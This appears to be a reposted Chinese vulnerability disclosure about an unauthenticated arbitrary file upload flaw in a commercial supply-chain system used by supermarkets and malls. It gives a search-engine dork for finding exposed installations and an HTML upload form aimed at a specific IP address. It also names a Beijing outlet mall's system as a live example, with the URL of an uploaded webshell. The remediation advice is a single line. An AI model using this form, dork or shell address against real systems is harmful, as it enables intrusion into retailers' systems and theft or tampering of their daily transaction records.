涉及全国多家超市、商场,系统涉及的都是每天的流水账。 技术支持:北京富基融通科技有限公司(http://HdhCmsTeste-future测试数据.cn/)
程序名称:商业供应链系统 漏洞 类型:任意文件上传导致代码执行 是否需要登录:否 漏洞文件:/web/epublic/upload. jsp 漏洞参数:File1 关键字:google & baidu intitle:商业供应链系统 影响用户: 可以参看开发公司的案例介绍: http://HdhCmsTeste-future测试数据.cn/case_market.php
利用方式: 本地构造表单上传,代码如下:
<!DOCTYPE HTML> < html > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>UploadiFive Test</title> </head> <body> <form enctype="multipart/form-data" action="http://123.127.107.117/web/epublic/upload.jsp" method="post"> <input type="file" name="Filedata" size="50"><br> <input type="submit" value="Upload"> </form> </body> </html>提交后报错,不管它,直接访问/web/upload/xxx.jsp (xxx.jsp为上传的文件名)
实例演示: ####1: 北京奥特莱斯SCM商业供应链 系统 http://123.127.107.117/web/epublic/upload.jsp shell地址:http://123.127.107.117/web/upload/silicwebshell.jsp
修复方案:
权限限制访问,上传文件限定类型
查看更多关于某商业链系统通用任意文件上传漏洞,直接Getshe的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15261